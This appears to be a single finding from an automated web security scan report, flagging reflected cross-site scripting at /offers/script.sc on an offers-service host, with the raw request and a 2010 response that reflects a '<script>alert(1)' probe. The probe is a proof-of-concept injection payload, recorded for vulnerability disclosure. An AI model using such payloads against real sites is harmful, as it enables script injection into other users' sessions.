1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://offers-service |
Path: | /offers/script.sc |
GET /offers/script.sc?offerId Accept: */* Referer: http://news.cnet.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: offers-service.cbsin Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 88 Date: Sun, 07 Nov 2010 22:10:53 GMT // Offer id 7894b85<script>alert(1)< |